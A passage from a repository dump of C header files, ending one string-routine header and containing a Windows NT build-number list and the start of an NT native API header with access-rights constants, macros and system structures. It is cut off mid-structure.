_strcmp_w\n#define _strncmp _strncmp_w\n#define _strcmpi _strcmpi_w\n#define _strncmpi _strncmpi_w\n#define _strstr _strstr_w\n#define _strstri _strstri_w\n#define _strchr _strchr_w\n\n#define ultostr ultostr_w\n#define ultohex ultohex_w\n#define itostr itostr_w\n#define i64tostr i64tostr_w\n#define u64tostr u64tostr_w\n#define u64tohex u64tohex_w\n\n#define _strtoul strtoul_w\n#define hextoul hextoul_w\n#define strtoi strtoi_w\n#define strtoi64 strtoi64_w\n#define strtou64 strtou64_w\n#define hextou64 hextou64_w\n\n#else // ANSI\n\n#define _strend _strend_a\n#define _strcpy _strcpy_a\n#define _strcat _strcat_a\n#define _strlen _strlen_a\n#define _strncpy _strncpy_a\n#define _strcpyn _strcpyn_a\n\n#define _strcmp _strcmp_a\n#define _strncmp _strncmp_a\n#define _strcmpi _strcmpi_a\n#define _strncmpi _strncmpi_a\n#define _strstr _strstr_a\n#define _strstri _strstri_a\n#define _strchr _strchr_a\n\n#define ultostr ultostr_a\n#define ultohex ultohex_a\n#define itostr itostr_a\n#define i64tostr i64tostr_a\n#define u64tostr u64tostr_a\n#define u64tohex u64tohex_a\n\n#define _strtoul strtoul_a\n#define hextoul hextoul_a\n#define strtoi strtoi_a\n#define strtoi64 strtoi64_a\n#define strtou64 strtou64_a\n#define hextou64 hextou64_a\n\n#endif\n\n#endif /* _MINIRTL_ */\n"
},
{
"path": "Source/Shared/ntos/ntbuilds.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2021 - 2025\n*\n* TITLE: NTBUILDS.H\n*\n* VERSION: 1.28\n*\n* DATE: 18 Sep 2025\n*\n* Windows NT builds definition file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n//\n// Defines for Major Windows NT release builds\n//\n\n// Windows 7 RTM\n#define NT_WIN7_RTM 7600\n\n// Windows 7 SP1\n#define NT_WIN7_SP1 7601\n\n// Windows 8 RTM\n#define NT_WIN8_RTM 9200\n\n// Windows 8.1\n#define NT_WIN8_BLUE 9600\n\n// Windows 10 TH1\n#define NT_WIN10_THRESHOLD1 10240\n\n// Windows 10 TH2\n#define NT_WIN10_THRESHOLD2 10586\n\n// Windows 10 RS1\n#define NT_WIN10_REDSTONE1 14393\n\n// Windows 10 RS2\n#define NT_WIN10_REDSTONE2 15063\n\n// Windows 10 RS3\n#define NT_WIN10_REDSTONE3 16299\n\n// Windows 10 RS4\n#define NT_WIN10_REDSTONE4 17134\n\n// Windows 10 RS5\n#define NT_WIN10_REDSTONE5 17763\n\n// Windows 10 19H1\n#define NT_WIN10_19H1 18362\n\n// Windows 10 19H2\n#define NT_WIN10_19H2 18363\n\n// Windows 10 20H1\n#define NT_WIN10_20H1 19041\n\n// Windows 10 20H2\n#define NT_WIN10_20H2 19042\n\n// Windows 10 21H1\n#define NT_WIN10_21H1 19043\n\n// Windows 10 21H2\n#define NT_WIN10_21H2 19044\n\n// Windows 10 22H2\n#define NT_WIN10_22H2 19045\n\n// Windows Server 2022\n#define NT_WINSRV_21H1 20348\n\n// Windows 11 21H2\n#define NT_WIN11_21H2 22000\n\n// Windows 11 22H2\n#define NT_WIN11_22H2 22621\n\n// Windows 11 23H2\n#define NT_WIN11_23H2 22631\n\n// Windows 11 24H2\n#define NT_WIN11_24H2 26100\n\n// Windows 11 25H2\n#define NT_WIN11_25H2 26200\n\n// Windows 11 Active Development Branch\n#define NT_WIN11_ADB 27943\n"
},
{
"path": "Source/Shared/ntos/ntos.h",
"content": "/************************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2025\n* Translated from Microsoft sources/debugger or mentioned elsewhere.\n*\n* TITLE: NTOS.H\n*\n* VERSION: 1.237\n*\n* DATE: 22 Aug 2025\n*\n* Common header file for the ntos API functions and definitions.\n*\n* Only projects required API/definitions.\n*\n* Depends on: Windows.h\n* NtStatus.h\n*\n* Include: Windows.h\n* NtStatus.h\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n************************************************************************************/\n\n#if defined (_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#pragma warning(push)\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int\n\n#ifndef NTOS_RTL\n#define NTOS_RTL\n\n//\n// NTOS_RTL HEADER BEGIN\n//\n\n//\n// Enable LIST_ENTRY macroses.\n//\n#define NTOS_ENABLE_LIST_ENTRY_MACRO\n\n#if defined(__cplusplus)\n\n#ifndef MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS\n#define MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 0\n#endif\n\nextern \"C\" {\n#endif\n\n#pragma comment(lib, \"ntdll.lib\")\n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 0x1000ull\n#endif\n\n#ifndef ABSOLUTE_TIME\n#define ABSOLUTE_TIME(wait) (wait)\n#endif\n\n#ifndef RELATIVE_TIME\n#define RELATIVE_TIME(wait) (-(wait))\n#endif\n\n#ifndef NANOSECONDS\n#define NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)\n#endif\n\n#ifndef MICROSECONDS\n#define MICROSECONDS(micros) (((signed __int64)(micros)) * NANOSECONDS(1000L))\n#endif\n\n#ifndef MILLISECONDS\n#define MILLISECONDS(milli) (((signed __int64)(milli)) * MICROSECONDS(1000L))\n#endif\n\n#ifndef SECONDS\n#define SECONDS(seconds) (((signed __int64)(seconds)) * MILLISECONDS(1000L))\n#endif\n\n#ifndef POI //poi-poi\n#define POI(addr) *(ULONG *)(addr)\n#endif\n\ntypedef char CCHAR;\ntypedef unsigned char UCHAR;\ntypedef CCHAR KPROCESSOR_MODE;\ntypedef UCHAR KIRQL;\ntypedef KIRQL *PKIRQL;\ntypedef ULONG CLONG;\ntypedef LONG KPRIORITY;\ntypedef short CSHORT;\ntypedef ULONGLONG REGHANDLE, *PREGHANDLE;\ntypedef PVOID *PDEVICE_MAP;\ntypedef PVOID PHEAD;\ntypedef PVOID PEJOB;\ntypedef PVOID PKTHREAD;\ntypedef struct _IO_TIMER* PIO_TIMER;\ntypedef LARGE_INTEGER PHYSICAL_ADDRESS;\ntypedef struct _EJOB* PESILO;\n\n#ifndef _WIN32_WINNT_WIN10\n#define _WIN32_WINNT_WIN10 0x0A00\n#endif\n#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)\ntypedef PVOID PMEM_EXTENDED_PARAMETER;\n#endif\n\n#ifndef IN_REGION\n#define IN_REGION(x, Base, Size) ( \\\n (((ULONG_PTR)(Base) + (ULONG_PTR)(Size)) > (ULONG_PTR)(Base)) && \\\n /* x within [Base, Base+Size) */ \\\n (((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && ((ULONG_PTR)(x) < ((ULONG_PTR)(Base) + (ULONG_PTR)(Size)))))\n#endif\n\n#define PE_SIGNATURE_SIZE 4\n#ifndef RTL_MEG\n#define RTL_MEG (1024UL * 1024UL)\n#endif\n#ifndef RTLP_IMAGE_MAX_DOS_HEADER\n#define RTLP_IMAGE_MAX_DOS_HEADER (256UL * RTL_MEG)\n#endif\n#ifndef MM_SIZE_OF_LARGEST_IMAGE\n#define MM_SIZE_OF_LARGEST_IMAGE ((ULONG)0x77000000)\n#endif\n#ifndef MM_MAXIMUM_IMAGE_HEADER\n#define MM_MAXIMUM_IMAGE_HEADER (2 * PAGE_SIZE)\n#endif\n#ifndef MM_MAXIMUM_IMAGE_SECTIONS\n#define MM_MAXIMUM_IMAGE_SECTIONS \\\n ((MM_MAXIMUM_IMAGE_HEADER - (PAGE_SIZE + sizeof(IMAGE_NT_HEADERS))) / \\\n sizeof(IMAGE_SECTION_HEADER))\n#endif\n\n//\n// Define alignment macros to align structure sizes and pointers up and down.\n//\n\n#ifndef ALIGN_UP_TYPE\n#define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))\n#endif\n\n#ifndef ALIGN_UP\n#define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type))\n#endif\n\n#ifndef ALIGN_DOWN_TYPE\n#define ALIGN_DOWN_TYPE(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))\n#endif\n\n#ifndef ALIGN_DOWN\n#define ALIGN_DOWN(Address, Type) ALIGN_DOWN_TYPE(Address, sizeof(Type))\n#endif\n\n#ifndef ALIGN_UP_BY\n#define ALIGN_UP_BY(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))\n#endif\n\n#ifndef ALIGN_DOWN_BY\n#define ALIGN_DOWN_BY(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))\n#endif\n\n#ifndef ALIGN_UP_POINTER_BY\n#define ALIGN_UP_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_UP_BY(Pointer, Align))\n#endif\n\n#ifndef ALIGN_DOWN_POINTER_BY\n#define ALIGN_DOWN_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_DOWN_BY(Pointer, Align))\n#endif\n\n#ifndef ALIGN_UP_POINTER\n#define ALIGN_UP_POINTER(Pointer, Type) ((PVOID)ALIGN_UP(Pointer, Type))\n#endif\n\n#ifndef ALIGN_DOWN_POINTER\n#define ALIGN_DOWN_POINTER(Pointer, Type) ((PVOID)ALIGN_DOWN(Pointer, Type))\n#endif\n\n#ifndef ARGUMENT_PRESENT\n#define ARGUMENT_PRESENT(ArgumentPointer) (\\\n (CHAR *)((ULONG_PTR)(ArgumentPointer)) != (CHAR *)(NULL) )\n#endif\n\n#ifndef LOGICAL\n#define LOGICAL ULONG\n#endif\n\n#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)\n#define ZwCurrentProcess() NtCurrentProcess()\n#define NtCurrentThread() ((HANDLE)(LONG_PTR)-2)\n#define ZwCurrentThread() NtCurrentThread()\n#define NtCurrentSession() ((HANDLE)(LONG_PTR)-3)\n#define ZwCurrentSession() NtCurrentSession()\n\n//Valid Only for Windows 8+\n#define NtCurrentProcessToken() ((HANDLE)(LONG_PTR)-4) \n#define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5)\n#define NtCurrentThreadEffectiveToken() ((HANDLE)(LONG_PTR)-6) //GetCurrentThreadEffectiveToken\n\nenum _KPROCESSOR_MODE {\n KernelMode = 0,\n UserMode,\n MaximumMode\n};\n\n//\n// ntdef.h begin\n//\n#ifndef RTL_CONSTANT_STRING\nchar _RTL_CONSTANT_STRING_type_check(const void *s);\n#define _RTL_CONSTANT_STRING_remove_const_macro(s) (s)\n#define RTL_CONSTANT_STRING(s) \\\n{ \\\n sizeof( s ) - sizeof( (s)[0] ), \\\n sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \\\n _RTL_CONSTANT_STRING_remove_const_macro(s) \\\n}\n#endif\n\n#ifndef RTL_CONSTANT_OBJECT_ATTRIBUTES\n#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \\\n { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }\n#endif\n\n// This synonym is more appropriate for initializing what isn't actually const.\n#ifndef RTL_INIT_OBJECT_ATTRIBUTES\n#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)\n#endif\n\n//\n// ntdef.h end\n//\n#ifndef RtlOffsetToPointer\n#define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) ))\n#endif\n\n#ifndef RtlPointerToOffset\n#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))\n#endif\n\n//\n// Valid values for the OBJECT_ATTRIBUTES.Attributes field\n//\n#define OBJ_INHERIT 0x00000002L\n#define OBJ_PERMANENT 0x00000010L\n#define OBJ_EXCLUSIVE 0x00000020L\n#define OBJ_CASE_INSENSITIVE 0x00000040L\n#define OBJ_OPENIF 0x00000080L\n#define OBJ_OPENLINK 0x00000100L\n#define OBJ_KERNEL_HANDLE 0x00000200L\n#define OBJ_FORCE_ACCESS_CHECK 0x00000400L\n#define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800L\n#define OBJ_DONT_REPARSE 0x00001000L\n#define OBJ_VALID_ATTRIBUTES 0x00001FF2L\n\n#define OBJ_PROTECT_CLOSE 0x00000001L\n#define OBJ_AUDIT_OBJECT_CLOSE 0x00000004L\n\n//\n// Callback Object Rights\n//\n#define CALLBACK_MODIFY_STATE 0x0001\n#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )\n\n//\n// CompositionSurface Access Rights\n//\n#ifndef COMPOSITIONSURFACE_READ\n#define COMPOSITIONSURFACE_READ 0x0001L\n#endif\n\n#ifndef COMPOSITIONSURFACE_WRITE\n#define COMPOSITIONSURFACE_WRITE 0x0002L\n#endif\n\n#ifndef COMPOSITIONSURFACE_ALL_ACCESS\n#define COMPOSITIONSURFACE_ALL_ACCESS (COMPOSITIONSURFACE_READ | COMPOSITIONSURFACE_WRITE)\n#endif\n\n//\n// Debug Object Access Rights\n//\n#define DEBUG_READ_EVENT (0x0001)\n#define DEBUG_PROCESS_ASSIGN (0x0002)\n#define DEBUG_SET_INFORMATION (0x0004)\n#define DEBUG_QUERY_INFORMATION (0x0008)\n#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\\\n DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)\n\n//\n// Directory Object Access Rights\n//\n#define DIRECTORY_QUERY (0x0001)\n#define DIRECTORY_TRAVERSE (0x0002)\n#define DIRECTORY_CREATE_OBJECT (0x0004)\n#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008)\n#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)\n\n//\n// Event Object Access Rights\n//\n#ifndef EVENT_QUERY_STATE\n#define EVENT_QUERY_STATE 0x0001\n#endif\n\n#ifndef EVENT_MODIFY_STATE //SDK compatibility\n#define EVENT_MODIFY_STATE 0x0002 \n#endif\n\n#ifndef EVENT_ALL_ACCESS //SDK compatibility\n#define EVENT_ALL_ACCESS(EVENT_QUERY_STATE | EVENT_MODIFY_STATE | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE)\n#endif\n\n//\n// EventPair Object Access Rights\n//\n#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)\n\n//\n// I/O Completion Object Access Rights\n//\n#define IO_COMPLETION_QUERY_STATE 0x0001\n#define IO_COMPLETION_MODIFY_STATE 0x0002 \n#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) \n\n//\n// KeyedEvent Object Access Rights\n//\n#define KEYEDEVENT_WAIT 0x0001\n#define KEYEDEVENT_WAKE 0x0002\n#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)\n\n//\n// Mutant Object Access Rights\n//\n#ifndef MUTANT_QUERY_STATE //SDK compatibility\n#define MUTANT_QUERY_STATE 0x0001\n#endif\n\n#ifndef MUTANT_ALL_ACCESS //SDK compatibility\n#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)\n#endif\n\n//\n// Port Object Access Rights\n//\n#define PORT_CONNECT (0x0001)\n#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | PORT_CONNECT)\n\n//\n// Filter Port Access Rights\n//\n#define FLT_PORT_CONNECT 0x0001\n#define FLT_PORT_ALL_ACCESS (FLT_PORT_CONNECT|STANDARD_RIGHTS_ALL)\n\n//\n// Profile Object Access Rights\n//\n#define PROFILE_CONTROL (0x0001)\n#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)\n\n//\n// Semaphore Object Access Rights\n//\n#ifndef SEMAPHORE_QUERY_STATE //SDK compatibility\n#define SEMAPHORE_QUERY_STATE 0x0001\n#endif\n\n#ifndef SEMAPHORE_MODIFY_STATE //SDK compatibility\n#define SEMAPHORE_MODIFY_STATE 0x0002 \n#endif\n\n#ifndef SEMAPHORE_ALL_ACCESS //SDK compatibility\n#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|SEMAPHORE_QUERY_STATE|SEMAPHORE_MODIFY_STATE)\n#endif\n\n//\n// Time Object Access rights\n//\n#ifndef TIMER_QUERY_STATE\n#define TIMER_QUERY_STATE 0x0001\n#endif\n\n#ifndef TIMER_MODIFY_STATE\n#define TIMER_MODIFY_STATE 0x0002\n#endif\n\n#ifndef TIMER_ALL_ACCESS\n#define TIMER_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|TIMER_QUERY_STATE|TIMER_MODIFY_STATE)\n#endif\n\n//\n// SymbolicLink Object Access Rights\n//\n#define SYMBOLIC_LINK_QUERY 0x0001\n#define SYMBOLIC_LINK_SET 0x0002\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYMBOLIC_LINK_QUERY)\n#define SYMBOLIC_LINK_ALL_ACCESS_EX (STANDARD_RIGHTS_REQUIRED | 0xFFFF)\n\n//\n// Thread Object Access Rights\n//\n#define THREAD_ALERT (0x0004)\n\n#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001\n#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002 \n#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004\n#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010 \n#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020\n#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x00000040\n#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080\n\n//\n// Worker Factory Object Access Rights\n//\n#define WORKER_FACTORY_RELEASE_WORKER 0x0001\n#define WORKER_FACTORY_WAIT 0x0002\n#define WORKER_FACTORY_SET_INFORMATION 0x0004\n#define WORKER_FACTORY_QUERY_INFORMATION 0x0008\n#define WORKER_FACTORY_READY_WORKER 0x0010\n#define WORKER_FACTORY_SHUTDOWN 0x0020\n\n#define WORKER_FACTORY_ALL_ACCESS ( \\\n STANDARD_RIGHTS_REQUIRED | \\\n WORKER_FACTORY_RELEASE_WORKER | \\\n WORKER_FACTORY_WAIT | \\\n WORKER_FACTORY_SET_INFORMATION | \\\n WORKER_FACTORY_QUERY_INFORMATION | \\\n WORKER_FACTORY_READY_WORKER | \\\n WORKER_FACTORY_SHUTDOWN \\\n )\n\n//\n// Type Object Access Rights\n//\n#define OBJECT_TYPE_CREATE (0x0001)\n#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | OBJECT_TYPE_CREATE)\n\n//\n// WMI Object Access Rights\n//\n#define WMIGUID_QUERY 0x0001\n#define WMIGUID_SET 0x0002\n#define WMIGUID_NOTIFICATION 0x0004\n#define WMIGUID_READ_DESCRIPTION 0x0008\n#define WMIGUID_EXECUTE 0x0010\n#define TRACELOG_CREATE_REALTIME 0x0020\n#define TRACELOG_CREATE_ONDISK 0x0040\n#define TRACELOG_GUID_ENABLE 0x0080\n#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100\n#define TRACELOG_LOG_EVENT 0x0200 // used on Vista and greater\n#define TRACELOG_CREATE_INPROC 0x0200 // used pre-Vista\n#define TRACELOG_ACCESS_REALTIME 0x0400\n#define TRACELOG_REGISTER_GUIDS 0x0800\n#define TRACELOG_JOIN_GROUP 0x1000\n\n//\n// Memory Partition Object Access Rights\n//\n#ifndef MEMORY_PARTITION_QUERY_ACCESS\n#define MEMORY_PARTITION_QUERY_ACCESS 0x0001\n#define MEMORY_PARTITION_MODIFY_ACCESS 0x0002\n\n#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \\\n SYNCHRONIZE | \\\n MEMORY_PARTITION_QUERY_ACCESS | \\\n MEMORY_PARTITION_MODIFY_ACCESS)\n#endif\n\n//\n// Define special ByteOffset parameters for read and write operations\n//\n#ifndef FILE_WRITE_TO_END_OF_FILE\n#define FILE_WRITE_TO_END_OF_FILE 0xffffffff\n#endif\n#ifndef FILE_USE_FILE_POINTER_POSITION\n#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe\n#endif\n\n#ifndef FILE_SHARE_VALID_FLAGS\n#define FILE_SHARE_VALID_FLAGS FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE\n#endif\n\n//\n// This is the maximum MaximumLength for a UNICODE_STRING.\n//\n#ifndef MAXUSHORT\n#define MAXUSHORT 0xffff \n#endif\n#ifndef MAX_USTRING\n#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )\n#endif\n\ntypedef struct _EX_RUNDOWN_REF {\n union\n {\n ULONG Count;\n PVOID Ptr;\n };\n} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF;\n\n#ifdef _WIN64\n#define MAX_FAST_REFS 15\n#else\n#define MAX_FAST_REFS 7\n#endif\n\ntypedef struct _EX_FAST_REF {\n union {\n PVOID Object;\n#if defined (_WIN64)\n ULONG_PTR RefCnt : 4;\n#else\n ULONG_PTR RefCnt : 3;\n#endif\n ULONG_PTR Value;\n };\n} EX_FAST_REF, *PEX_FAST_REF;\n\ntypedef struct _UNICODE_STRING {\n USHORT Length;\n USHORT MaximumLength;\n PWSTR Buffer;\n} UNICODE_STRING, *PUNICODE_STRING;\ntypedef const UNICODE_STRING *PCUNICODE_STRING;\n\n#ifndef STATIC_UNICODE_STRING\n#define STATIC_UNICODE_STRING(string, value) \\\n static UNICODE_STRING string = { sizeof(value) - sizeof(WCHAR), sizeof(value), value };\n#endif\n\ntypedef struct _STRING {\n USHORT Length;\n USHORT MaximumLength;\n PCHAR Buffer;\n} STRING;\ntypedef STRING *PSTRING;\n\ntypedef STRING ANSI_STRING;\ntypedef PSTRING PANSI_STRING;\n\ntypedef STRING OEM_STRING;\ntypedef PSTRING POEM_STRING;\ntypedef CONST STRING* PCOEM_STRING;\ntypedef CONST char *PCSZ;\n\ntypedef struct _CSTRING {\n USHORT Length;\n USHORT MaximumLength;\n CONST char *Buffer;\n} CSTRING;\ntypedef CSTRING *PCSTRING;\n#define ANSI_NULL ((CHAR)0)\n\ntypedef STRING CANSI_STRING;\ntypedef PSTRING PCANSI_STRING;\n\ntypedef struct _OBJECT_ATTRIBUTES {\n ULONG Length;\n HANDLE RootDirectory;\n PUNICODE_STRING ObjectName;\n ULONG Attributes;\n PVOID SecurityDescriptor;\n PVOID SecurityQualityOfService;\n} OBJECT_ATTRIBUTES;\ntypedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;\n\ntypedef struct _IO_STATUS_BLOCK {\n union {\n NTSTATUS Status;\n PVOID Pointer;\n } DUMMYUNIONNAME;\n\n ULONG_PTR Information;\n} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;\n\n#ifndef INTERFACE_TYPE\ntypedef enum _INTERFACE_TYPE {\n InterfaceTypeUndefined = -1,\n Internal = 0,\n Isa,\n Eisa,\n MicroChannel,\n TurboChannel,\n PCIBus,\n VMEBus,\n NuBus,\n PCMCIABus,\n CBus,\n MPIBus,\n MPSABus,\n ProcessorInternal,\n InternalPowerBus,\n PNPISABus,\n PNPBus,\n Vmcs,\n ACPIBus,\n MaximumInterfaceType\n} INTERFACE_TYPE, * PINTERFACE_TYPE;\n#endif\n\n/*\n** FileCache and MemoryList START\n*/\n\ntypedef enum _SYSTEM_MEMORY_LIST_COMMAND {\n MemoryCaptureAccessedBits,\n MemoryCaptureAndResetAccessedBits,\n MemoryEmptyWorkingSets,\n MemoryFlushModifiedList,\n MemoryPurgeStandbyList,\n MemoryPurgeLowPriorityStandbyList,\n MemoryCommandMax\n} SYSTEM_MEMORY_LIST_COMMAND;\n\ntypedef struct _SYSTEM_FILECACHE_INFORMATION {\n SIZE_T CurrentSize;\n SIZE_T PeakSize;\n ULONG PageFaultCount;\n SIZE_T MinimumWorkingSet;\n SIZE_T MaximumWorkingSet;\n SIZE_T CurrentSizeIncludingTransitionInPages;\n SIZE_T PeakSizeIncludingTransitionInPages;\n ULONG TransitionRePurposeCount;\n ULONG Flags;\n} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION;\n\n/*\n** FileCache and MemoryList END\n*/\n\n/*\n** Processes START\n*/\n\ntypedef struct _SYSTEM_TIMEOFDAY_INFORMATION {\n LARGE_INTEGER BootTime;\n LARGE_INTEGER CurrentTime;\n LARGE_INTEGER TimeZoneBias;\n ULONG TimeZoneId;\n ULONG Reserved;\n ULONGLONG BootTimeBias;\n ULONGLONG SleepTimeBias;\n} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION;\n\ntypedef enum _THREAD_STATE {\n StateInitialized,\n StateReady,\n StateRunning,\n StateStandby,\n StateTerminated,\n StateWait,\n StateTransition,\n StateUnknown\n} THREAD_STATE;\n\ntypedef enum _KWAIT_REASON {\n Executive = 0,\n FreePage,\n PageIn,\n PoolAllocation,\n DelayExecution,\n Suspended,\n UserRequest,\n WrExecutive,\n WrFreePage,\n WrPageIn,\n WrPoolAllocation,\n WrDelayExecution,\n WrSuspended,\n WrUserRequest,\n WrEventPair, //has no effect after 7\n WrQueue,\n WrLpcReceive,\n WrLpcReply,\n WrVirtualMemory,\n WrPageOut,\n WrRendezvous,\n WrKeyedEvent,\n WrTerminated,\n WrProcessInSwap,\n WrCpuRateControl,\n WrCalloutStack,\n WrKernel,\n WrResource,\n WrPushLock,\n WrMutex,\n WrQuantumEnd,\n WrDispatchInt,\n WrPreempted,\n WrYieldExecution,\n WrFastMutex,\n WrGuardedMutex,\n WrRundown,\n WrAlertByThreadId,\n WrDeferredPreempt,\n WrPhysicalFault,\n WrIoRing,\n WrMdlCache,\n WrRcu,\n MaximumWaitReason\n} KWAIT_REASON;\n\ntypedef VOID KSTART_ROUTINE(\n _In_ PVOID StartContext\n);\ntypedef KSTART_ROUTINE *PKSTART_ROUTINE;\n\ntypedef struct _CLIENT_ID {\n HANDLE UniqueProcess;\n HANDLE UniqueThread;\n} CLIENT_ID, *PCLIENT_ID;\n\ntypedef struct _CLIENT_ID64 {\n ULONG64 UniqueProcess;\n ULONG64 UniqueThread;\n} CLIENT_ID64, *PCLIENT_ID64;\n\ntypedef struct _CLIENT_ID32 {\n ULONG32 UniqueProcess;\n ULONG32 UniqueThread;\n} CLIENT_ID32, *PCLIENT_ID32;\n\ntypedef struct _VM_COUNTERS {\n SIZE_T PeakVirtualSize;\n SIZE_T VirtualSize;\n ULONG PageFaultCount;\n SIZE_T PeakWorkingSetSize;\n SIZE_T WorkingSetSize;\n SIZE_T QuotaPeakPagedPoolUsage;\n SIZE_T QuotaPagedPoolUsage;\n SIZE_T QuotaPeakNonPagedPoolUsage;\n SIZE_T QuotaNonPagedPoolUsage;\n SIZE_T PagefileUsage;\n SIZE_T PeakPagefileUsage;\n SIZE_T PrivatePageCount;\n} VM_COUNTERS;\n\ntypedef struct _SYSTEM_THREAD_INFORMATION {\n LARGE_INTEGER KernelTime;\n LARGE_INTEGER UserTime;\n LARGE_INTEGER CreateTime;\n ULONG WaitTime;\n PVOID StartAddress;\n CLIENT_ID ClientId;\n KPRIORITY Priority;\n KPRIORITY BasePriority;\n ULONG ContextSwitchCount;\n THREAD_STATE State;\n KWAIT_REASON WaitReason;\n} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;\n\ntypedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION {\n SYSTEM_THREAD_INFORMATION ThreadInfo;\n PVOID StackBase;\n PVOID StackLimit;\n PVOID Win32StartAddress;\n PVOID TebBase;\n ULONG_PTR Reserved2;\n ULONG_PTR Reserved3;\n ULONG_PTR Reserved4;\n} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESS_INFORMATION {\n ULONG NextEntryDelta;\n ULONG ThreadCount;\n LARGE_INTEGER WorkingSetPrivateSize;\n ULONG HardFaultCount;\n ULONG NumberOfThreadsHighWatermark;\n ULONGLONG CycleTime;\n LARGE_INTEGER CreateTime;\n LARGE_INTEGER UserTime;\n LARGE_INTEGER KernelTime;\n UNICODE_STRING ImageName;\n KPRIORITY BasePriority;\n HANDLE UniqueProcessId;\n HANDLE InheritedFromUniqueProcessId;\n ULONG HandleCount;\n ULONG 